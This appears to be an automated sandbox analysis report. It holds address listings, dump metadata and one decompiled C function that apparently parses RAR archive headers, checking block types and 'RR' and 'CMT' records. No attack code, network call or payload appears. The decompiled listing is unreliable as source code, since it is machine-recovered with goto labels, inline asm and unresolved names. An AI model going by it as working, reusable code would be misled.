                                            0x00c5d730
                                            0x00c5d725
                                            0x00c5d783
                                            0x00c5d783
                                            0x00c5d783
                                            0x00c5d78f
                                            0x00c5d792
                                            0x00c5d798
                                            0x00c5d79a
                                            0x00c5d79c
                                            0x00c5d7a2
                                            0x00c5d7a4
                                            0x00c5d7a4
                                            0x00c5d7a4
                                            0x00c5d7a2
                                            0x00c5d7a9
                                            0x00c5d7aa
                                            0x00c5d7ac
                                            0x00c5d7ae
                                            0x00c5d7ae
                                            0x00c5d7b0
                                            0x00c5d7b6
                                            0x00c5d7bc
                                            0x00c5d7be
                                            0x00c5d7c4
                                            0x00c5d7c4
                                            0x00c5d7ca
                                            0x00c5d7cc
                                            0x00000000
                                            0x00000000
                                            0x00c5d7d2
                                            0x00c5d7d4
                                            0x00c5d7d6
                                            0x00c5d7d6
                                            0x00c5d7d8
                                            0x00c5d7d8
                                            0x00c5d7e8
                                            0x00c5d7ef
                                            0x00c5d7f2
                                            0x00c5d7f3
                                            0x00c5d7f5
                                            0x00c5d7f5
                                            0x00c5d7f9
                                            0x00c5d7ff
                                            0x00c5d801
                                            0x00c5d803
                                            0x00c5d809
                                            0x00c5d80c
                                            0x00c5d81d
                                            0x00c5d820
                                            0x00c5d826
                                            0x00c5d83b
                                            0x00c5d840
                                            0x00c5d80e
                                            0x00c5d80e
                                            0x00c5d815
                                            0x00c5d815
                                            0x00c5d80c
                                            0x00c5d851
                                            0x00c5d860
                                            0x00c5d861
                                            0x00c5d861
                                            0x00c5d863
                                            0x00c5d865
                                            0x00c5d865
                                            0x00c5d86b
                                            0x00c5d86e
                                            0x00c5d870
                                            0x00c5d872
                                            0x00c5d872
                                            0x00c5d875
                                            0x00c5d876
                                            0x00c5d876
                                            0x00c5d87b
                                            0x00c5d87e
                                            0x00c5d882
                                            0x00c5d882
                                            0x00c5d883
                                            0x00c5d885
                                            0x00c5d88b
                                            0x00c5d891
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5d891
                                            0x00c5d7c4
                                            0x00c5d897
                                            0x00c5d897
                                            0x00000000
                                            0x00c5d897
                                            0x00c5c61c
                                            0x00c5c613
                                            0x00c5c60a
                                            0x00c5c5c1
                                            0x00c5c5c5
                                            0x00c5c5cd
                                            0x00000000
                                            0x00c5c5cf
                                            0x00c5c5d5
                                            0x00c5c5da
                                            0x00c5d8b6
                                            0x00c5d8b6
                                            0x00c5d8b9
                                            0x00c5d8c4
                                            0x00c5d8ef
                                            0x00c5d8f0
                                            0x00c5d8f1
                                            0x00c5d8f2
                                            0x00c5d8f3
                                            0x00c5d8f4
                                            0x00c5d8f9
                                            0x00c5d901
                                            0x00c5d906
                                            0x00c5d90c
                                            0x00c5d911
                                            0x00c5d912
                                            0x00c5d912
                                            0x00c5d912
                                            0x00c5d918
                                            0x00c5d919
                                            0x00c5d919
                                            0x00c5d91c
                                            0x00c5d922
                                            0x00000000
                                            0x00000000
                                            0x00c5d924
                                            0x00c5d929
                                            0x00c5d92c
                                            0x00c5d92e
                                            0x00c5d936
                                            0x00c5d938
                                            0x00c5d93a
                                            0x00c5d93f
                                            0x00c5d942
                                            0x00c5d948
                                            0x00c5d94b
                                            0x00c5d94d
                                            0x00c5d94d
                                            0x00c5d94d
                                            0x00c5d94d
                                            0x00c5d94b
                                            0x00c5d950
                                            0x00c5d95c
                                            0x00c5d962
                                            0x00c5d96a
                                            0x00c5d96f
                                            0x00c5d970
                                            0x00c5d975
                                            0x00c5d975
                                            0x00c5d975
                                            0x00c5d975
                                            0x00c5d979
                                            0x00c5d979
                                            0x00c5d97c
                                            0x00c5d983
                                            0x00c5d990
                                            0x00c5d8c6
                                            0x00c5d8c6
                                            0x00c5d8c6
                                            0x00c5d8d0
                                            0x00c5d8d9
                                            0x00c5d8de
                                            0x00c5d8ec
                                            0x00c5d8ec
                                            0x00c5d8c4
                                            0x00c5c5cd

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                            • API String ID: 4168288129-2761157908
                                            • Opcode ID: 08e870aec349c6ca81d647ca4fc3aa375f1dfe30467441046c9c6e454a3ef870
                                            • Instruction ID: daf1422ba9725943e60b9ddf6b0165c09385ffb6aff82f0685aa9bf859fe0cbd
                                            • Opcode Fuzzy Hash: 08e870aec349c6ca81d647ca4fc3aa375f1dfe30467441046c9c6e454a3ef870
                                            • Instruction Fuzzy Hash: 3DC23975E046288FDB35CE289D807EAB7B5EB44306F1441EAD85EE7240E774AEC98F44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C32692, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 783COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00C32692(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t333;
				signed int _t337;
				char _t356;
				signed short _t363;
				signed int _t368;
				signed int _t374;
				signed char _t376;
				signed char _t379;
				char _t396;
				signed int _t397;
				signed int _t401;
				signed char _t415;
				intOrPtr _t416;
				char _t417;
				signed int _t420;
				signed int _t421;
				signed char _t426;
				signed int _t429;
				signed int _t433;
				signed short _t438;
				signed short _t443;
				unsigned int _t448;
				signed int _t451;
				void* _t454;
				signed int _t456;
				signed int _t459;
				void* _t466;
				signed int _t472;
				unsigned int _t476;
				void* _t477;
				void* _t484;
				void* _t485;
				signed char _t491;
				signed int _t505;
				intOrPtr* _t518;
				signed int _t521;
				signed int _t522;
				intOrPtr* _t523;
				signed int _t531;
				signed int _t536;
				signed int _t538;
				unsigned int _t547;
				signed int _t549;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				void* _t586;
				signed int _t590;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				unsigned int _t612;
				signed char _t628;
				signed char _t638;
				signed int _t641;
				unsigned int _t642;
				signed int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				unsigned int _t651;
				signed int _t655;
				void* _t656;
				void* _t663;
				signed int _t666;
				signed int _t667;
				signed char _t668;
				signed int _t671;
				void* _t673;
				signed int _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed int _t687;
				signed int _t694;
				signed int _t695;
				intOrPtr _t697;
				void* _t698;
				signed char _t707;

				_t523 = __ecx;
				E00C4D870(E00C61197, _t698);
				E00C4D940();
				_t518 = _t523;
				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
				E00C3C223(_t698 + 0x24, _t518);
				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
				 *((intOrPtr*)(_t698 - 4)) = 0;
				_t655 = 7;
				if( *(_t518 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t698 + 0x5f)) = 0;
					L7:
					E00C3C42E(_t638, _t655);
					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
						 *(_t518 + 0x21e4) = E00C3C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f4) = 0;
						_t679 = E00C3C251(_t698 + 0x24) & 0x000000ff;
						_t333 = E00C3C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21ec) = _t333;
						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
						_t531 = E00C3C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f0) = _t531;
						 *(_t518 + 0x21e8) = _t679;
						__eflags = _t531 - _t655;
						if(_t531 >= _t655) {
							_t680 = _t679 - 0x73;
							__eflags = _t680;
							if(_t680 == 0) {
								 *(_t518 + 0x21e8) = 1;
							} else {
								_t694 = _t680 - 1;
								__eflags = _t694;
								if(_t694 == 0) {
									 *(_t518 + 0x21e8) = 2;
								} else {
									_t695 = _t694 - 6;
									__eflags = _t695;
									if(_t695 == 0) {
										 *(_t518 + 0x21e8) = 3;
									} else {
										__eflags = _t695 == 1;
										if(_t695 == 1) {
											 *(_t518 + 0x21e8) = 5;
										}
									}
								}
							}
							_t337 =  *(_t518 + 0x21e8);
							 *(_t518 + 0x21dc) = _t337;
							__eflags = _t337 - 0x75;
							if(_t337 != 0x75) {
								__eflags = _t337 - 1;
								if(_t337 != 1) {
									L23:
									_push(_t531 - 7);
									L24:
									E00C3C42E(_t638);
									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E00C31901(_t518,  *(_t518 + 0x21f0));
									_t536 =  *(_t518 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
									 *(_t698 + 0x50) = _t536;
									__eflags = _t536 - 1;
									if(__eflags == 0) {
										_t656 = _t518 + 0x2208;
										E00C3A96C(_t656);
										_t538 = 5;
										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
										 *(_t518 + 0x221c) = E00C3C269(_t698 + 0x24);
										_t638 = E00C3C29E(_t698 + 0x24);
										 *(_t518 + 0x2220) = _t638;
										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
										_t547 =  *(_t518 + 0x2210);
										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
										__eflags = _t638;
										if(_t638 != 0) {
											L119:
											_t356 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t518 + 0x6cb8)) = _t356;
											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
											_t549 = _t547 >> 0x00000004 & 0x00000001;
											__eflags = _t549;
											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
											 *(_t518 + 0x6cba) = _t549;
											L121:
											_t655 = 7;
											L122:
											_t363 = E00C3C34F(_t698 + 0x24, 0);
											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
												goto L133;
											}
											_t368 =  *(_t518 + 0x21e8);
											__eflags = _t368 - 0x79;
											if(_t368 == 0x79) {
												goto L132;
											}
											__eflags = _t368 - 0x76;
											if(_t368 == 0x76) {
												goto L132;
											}
											__eflags = _t368 - 5;
											if(_t368 != 5) {
												L130:
												 *((char*)(_t518 + 0x6cc4)) = 1;
												E00C36E03(0xc700e0, 3);
												__eflags =  *((char*)(_t698 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E00C36BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
												 *((char*)(_t518 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t518 + 0x45ae);
											if( *(_t518 + 0x45ae) == 0) {
												goto L130;
											}
											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
											__eflags = _t374;
											asm("sbb edx, ecx");
											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
											 *(_t698 + 0x5e) = 1;
											do {
												_t376 = E00C3972B(_t518);
												asm("sbb al, al");
												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
												 *(_t698 + 0x5e) = _t379;
												_t655 = _t655 - 1;
												__eflags = _t655;
											} while (_t655 != 0);
											__eflags = _t379;
											if(_t379 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t356 = 0;
										__eflags =  *(_t518 + 0x221c);
										if( *(_t518 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E00C3C29E(_t698 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t536 - 3;
									if(_t536 <= 3) {
										__eflags = _t536 - 2;
										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
										 *(_t698 + 0x48) = _t663;
										E00C3A8D2(_t663, 0);
										_t560 = 5;
										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
										_t685 =  *(_t698 + 0x48);
										_t666 =  *(_t698 + 0x50);
										_t562 =  *(_t685 + 8);
										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
										__eflags = _t666 - 2;
										if(_t666 != 2) {
											L35:
											_t641 = 0;
											__eflags = 0;
											_t396 = 0;
											L36:
											 *((char*)(_t685 + 0x10f0)) = _t396;
											__eflags = _t666 - 2;
											if(_t666 == 2) {
												L39:
												_t397 = _t641;
												L40:
												 *(_t685 + 0x10fa) = _t397;
												_t563 = _t562 & 0x000000e0;
												__eflags = _t563 - 0xe0;
												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
												__eflags = _t563 - 0xe0;
												if(_t563 != 0xe0) {
													_t642 =  *(_t685 + 8);
													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t401 = _t641;
													_t642 =  *(_t685 + 8);
												}
												 *(_t685 + 0x10f4) = _t401;
												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t685 + 0x14)) = E00C3C29E(_t698 + 0x24);
												 *(_t698 + 0x54) = E00C3C29E(_t698 + 0x24);
												 *((char*)(_t685 + 0x18)) = E00C3C251(_t698 + 0x24);
												 *(_t685 + 0x1070) = 2;
												 *((intOrPtr*)(_t685 + 0x1074)) = E00C3C29E(_t698 + 0x24);
												 *(_t698 + 0x18) = E00C3C29E(_t698 + 0x24);
												 *(_t685 + 0x1c) = E00C3C251(_t698 + 0x24) & 0x000000ff;
												 *((char*)(_t685 + 0x20)) = E00C3C251(_t698 + 0x24) - 0x30;
												 *(_t698 + 0x4c) = E00C3C269(_t698 + 0x24) & 0x0000ffff;
												_t415 = E00C3C29E(_t698 + 0x24);
												_t645 =  *(_t685 + 0x1c);
												 *(_t698 + 0x58) = _t415;
												 *(_t685 + 0x24) = _t415;
												__eflags = _t645 - 0x14;
												if(_t645 < 0x14) {
													__eflags = _t415 & 0x00000010;
													if((_t415 & 0x00000010) != 0) {
														 *((char*)(_t685 + 0x10f1)) = 1;
													}
												}
												 *(_t685 + 0x109c) = 0;
												__eflags =  *(_t685 + 0x109b);
												if( *(_t685 + 0x109b) == 0) {
													L55:
													_t416 =  *((intOrPtr*)(_t685 + 0x18));
													 *(_t685 + 0x10fc) = 2;
													__eflags = _t416 - 3;
													if(_t416 == 3) {
														L59:
														 *(_t685 + 0x10fc) = 1;
														L60:
														 *(_t685 + 0x1100) = 0;
														__eflags = _t416 - 3;
														if(_t416 == 3) {
															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t685 + 0x1100) = 1;
																 *((short*)(_t685 + 0x1104)) = 0;
															}
														}
														__eflags = _t666 - 2;
														if(_t666 == 2) {
															L66:
															_t417 = 0;
															goto L67;
														} else {
															__eflags =  *(_t685 + 0x24);
															if( *(_t685 + 0x24) >= 0) {
																goto L66;
															}
															_t417 = 1;
															L67:
															 *((char*)(_t685 + 0x10f8)) = _t417;
															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t420;
															 *(_t685 + 0x10f9) = _t420;
															if(_t420 == 0) {
																__eflags =  *(_t698 + 0x54) - 0xffffffff;
																_t638 = 0;
																_t667 = 0;
																_t137 =  *(_t698 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t421 = _t420 & 0xffffff00 | _t137;
																L73:
																 *(_t685 + 0x109a) = _t421;
																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
																asm("adc edx, ecx");
																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
																__eflags =  *(_t685 + 0x109a);
																 *(_t685 + 0x1064) = _t638;
																if( *(_t685 + 0x109a) != 0) {
																	 *(_t685 + 0x1060) = 0x7fffffff;
																	 *(_t685 + 0x1064) = 0x7fffffff;
																}
																_t426 =  *(_t698 + 0x4c);
																_t668 = 0x1fff;
																 *(_t698 + 0x54) = 0x1fff;
																__eflags = _t426 - 0x1fff;
																if(_t426 < 0x1fff) {
																	_t668 = _t426;
																	 *(_t698 + 0x54) = _t426;
																}
																E00C3C300(_t698 + 0x24, _t698 - 0x2030, _t668);
																_t429 = 0;
																__eflags =  *(_t698 + 0x50) - 2;
																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
																if( *(_t698 + 0x50) != 2) {
																	 *(_t698 + 0x50) = _t685 + 0x28;
																	_t432 = E00C40FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
																	__eflags =  *(_t685 + 8) & 0x00000400;
																	if(( *(_t685 + 8) & 0x00000400) != 0) {
																		_t671 = _t671 - 8;
																		__eflags = _t671;
																	}
																	__eflags = _t671;
																	if(_t671 <= 0) {
																		_t672 = _t685 + 0x28;
																	} else {
																		 *(_t698 + 0x58) = _t685 + 0x1028;
																		E00C31EDE(_t685 + 0x1028, _t671);
																		_t466 = E00C3C300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
																		_t672 = _t685 + 0x28;
																		_t432 = E00C52B69(_t466, _t685 + 0x28, L"RR");
																		__eflags = _t432;
																		if(_t432 == 0) {
																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
																				_t673 =  *( *(_t698 + 0x58));
																				asm("cdq");
																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t518 + 0x21c0) = _t472 << 9;
																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
																				_t476 = E00C3F749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
																				 *(_t518 + 0x21c8) = _t476;
																				 *(_t698 + 0x58) = _t476;
																				_t477 = E00C4D890(_t475, _t638, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t432 = E00C3F749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
																				_t612 =  *(_t698 + 0x58);
																				_t685 =  *(_t698 + 0x48);
																				_t672 =  *(_t698 + 0x50);
																				__eflags = _t432 - _t612;
																				if(_t432 > _t612) {
																					_t432 = _t612 + 1;
																					 *(_t518 + 0x21c8) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t433 = E00C52B69(_t432, _t672, L"CMT");
																	__eflags = _t433;
																	if(_t433 == 0) {
																		 *((char*)(_t518 + 0x6cb6)) = 1;
																	}
																} else {
																	_t672 = _t685 + 0x28;
																	 *_t672 = 0;
																	__eflags =  *(_t685 + 8) & 0x00000200;
																	if(( *(_t685 + 8) & 0x00000200) != 0) {
																		E00C369E0(_t698);
																		_t484 = E00C52BB0(_t698 - 0x2030);
																		_t638 =  *(_t698 + 0x54);
																		_t485 = _t484 + 1;
																		__eflags = _t638 - _t485;
																		if(_t638 > _t485) {
																			__eflags = _t485 + _t698 - 0x2030;
																			E00C369F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
																		}
																		_t429 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t672 - _t429;
																	if( *_t672 == _t429) {
																		_push(1);
																		_push(0x800);
																		_push(_t672);
																		_push(_t698 - 0x2030);
																		E00C3F79F();
																	}
																	E00C31F3D(_t518, _t685);
																}
																__eflags =  *(_t685 + 8) & 0x00000400;
																if(( *(_t685 + 8) & 0x00000400) != 0) {
																	E00C3C300(_t698 + 0x24, _t685 + 0x10a1, 8);
																}
																E00C408B2( *(_t698 + 0x18));
																__eflags =  *(_t685 + 8) & 0x00001000;
																if(( *(_t685 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E00C33CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
																	 *(_t518 + 0x6cac) = _t638;
																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
																	_t438 = E00C3C34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
																	if( *_t685 != (_t438 & 0x0000ffff)) {
																		 *((char*)(_t518 + 0x6cc4)) = 1;
																		E00C36E03(0xc700e0, 1);
																		__eflags =  *((char*)(_t698 + 0x5f));
																		if(__eflags == 0) {
																			E00C36BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
																		}
																	}
																	goto L121;
																} else {
																	_t443 = E00C3C269(_t698 + 0x24);
																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
																	__eflags = 0;
																	_t686 = 0;
																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
																	_t448 = _t443 & 0x0000ffff;
																	 *(_t698 + 0x4c) = 0;
																	 *(_t698 + 0x58) = _t448;
																	do {
																		_t586 = 3;
																		_t521 = _t448 >> _t586 - _t686 << 2;
																		__eflags = _t521 & 0x00000008;
																		if((_t521 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t698 + 4 + _t686 * 4);
																		if( *(_t698 + 4 + _t686 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t686;
																		if(__eflags != 0) {
																			E00C408B2(E00C3C29E(_t698 + 0x24));
																		}
																		E00C406E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
																		__eflags = _t521 & 0x00000004;
																		if((_t521 & 0x00000004) != 0) {
																			_t249 = _t698 - 0x1c;
																			 *_t249 =  *(_t698 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t590 = 0;
																		 *(_t698 - 0x18) = 0;
																		_t522 = _t521 & 0x00000003;
																		__eflags = _t522;
																		if(_t522 <= 0) {
																			L109:
																			_t451 = _t590 * 0x64;
																			__eflags = _t451;
																			 *(_t698 - 0x18) = _t451;
																			E00C40910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
																			_t448 =  *(_t698 + 0x58);
																		} else {
																			_t454 = 3;
																			_t456 = _t454 - _t522 << 3;
																			__eflags = _t456;
																			 *(_t698 + 0x18) = _t456;
																			_t687 = _t456;
																			do {
																				_t459 = (E00C3C251(_t698 + 0x24) & 0x000000ff) << _t687;
																				_t687 = _t687 + 8;
																				_t590 =  *(_t698 - 0x18) | _t459;
																				 *(_t698 - 0x18) = _t590;
																				_t522 = _t522 - 1;
																				__eflags = _t522;
																			} while (_t522 != 0);
																			_t686 =  *(_t698 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t686 = _t686 + 1;
																		 *(_t698 + 0x4c) = _t686;
																		__eflags = _t686 - 4;
																	} while (_t686 < 4);
																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
																	_t685 =  *(_t698 + 0x48);
																	goto L112;
																}
															}
															_t667 = E00C3C29E(_t698 + 0x24);
															_t491 = E00C3C29E(_t698 + 0x24);
															__eflags =  *(_t698 + 0x54) - 0xffffffff;
															_t638 = _t491;
															if( *(_t698 + 0x54) != 0xffffffff) {
																L71:
																_t421 = 0;
																goto L73;
															}
															__eflags = _t638 - 0xffffffff;
															if(_t638 != 0xffffffff) {
																goto L71;
															}
															_t421 = 1;
															goto L73;
														}
													}
													__eflags = _t416 - 5;
													if(_t416 == 5) {
														goto L59;
													}
													__eflags = _t416 - 6;
													if(_t416 < 6) {
														 *(_t685 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t646 = _t645 - 0xd;
													__eflags = _t646;
													if(_t646 == 0) {
														 *(_t685 + 0x109c) = 1;
														goto L55;
													}
													_t648 = _t646;
													__eflags = _t648;
													if(_t648 == 0) {
														 *(_t685 + 0x109c) = 2;
														goto L55;
													}
													_t649 = _t648 - 5;
													__eflags = _t649;
													if(_t649 == 0) {
														L52:
														 *(_t685 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t649 == 6;
													if(_t649 == 6) {
														goto L52;
													}
													 *(_t685 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t562 & 0x00000010;
											if((_t562 & 0x00000010) == 0) {
												goto L39;
											}
											_t397 = 1;
											goto L40;
										}
										__eflags = _t562 & 0x00000010;
										if((_t562 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t396 = 1;
											_t641 = 0;
											goto L36;
										}
									}
									__eflags = _t536 - 5;
									if(_t536 != 5) {
										goto L115;
									} else {
										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
										_t651 =  *(_t518 + 0x4598);
										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
										_t628 = _t651 >> 0x00000001 & 0x00000001;
										_t638 = _t651 >> 0x00000003 & 0x00000001;
										 *(_t518 + 0x45ad) = _t628;
										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x45af) = _t638;
										__eflags = _t628;
										if(_t628 != 0) {
											 *((intOrPtr*)(_t518 + 0x45a4)) = E00C3C29E(_t698 + 0x24);
										}
										__eflags =  *(_t518 + 0x45af);
										if( *(_t518 + 0x45af) != 0) {
											_t505 = E00C3C269(_t698 + 0x24) & 0x0000ffff;
											 *(_t518 + 0x45a8) = _t505;
											 *(_t518 + 0x6cd8) = _t505;
										}
										goto L121;
									}
								}
								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E00C31EF8(_t518);
							L133:
							E00C3159C(_t698 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
							return  *((intOrPtr*)(_t698 + 0x1c));
						}
					}
					L8:
					E00C33DAB(_t518, _t638);
					goto L133;
				}
				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
				asm("adc eax, ecx");
				_t707 =  *(_t518 + 0x6ca4);
				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
					goto L6;
				} else {
					 *((char*)(_t698 + 0x5f)) = 1;
					E00C33C40(_t518);
					_push(8);
					_push(_t698 + 0x14);
					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
						goto L8;
					} else {
						_t697 = _t518 + 0x1024;
						E00C3607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
						goto L7;
					}
				}
			}



















































































                                            0x00c32692
                                            0x00c3269b
                                            0x00c326a5
                                            0x00c326ac
                                            0x00c326b3
                                            0x00c326b6
                                            0x00c326bf
                                            0x00c326c2
                                            0x00c326c5
                                            0x00c326cc
                                            0x00c32734
                                            0x00c32734
                                            0x00c32737
                                            0x00c3273b
                                            0x00c32744
                                            0x00c32760
                                            0x00c32766
                                            0x00c32775
                                            0x00c3277d
                                            0x00c32783
                                            0x00c3278e
                                            0x00c32799
                                            0x00c3279c
                                            0x00c327a2
                                            0x00c327a8
                                            0x00c327aa
                                            0x00c327b8
                                            0x00c327b8
                                            0x00c327bb
                                            0x00c327f0
                                            0x00c327bd
                                            0x00c327bd
                                            0x00c327bd
                                            0x00c327c0
                                            0x00c327e4
                                            0x00c327c2
                                            0x00c327c2
                                            0x00c327c2
                                            0x00c327c5
                                            0x00c327d8
                                            0x00c327c7
                                            0x00c327c7
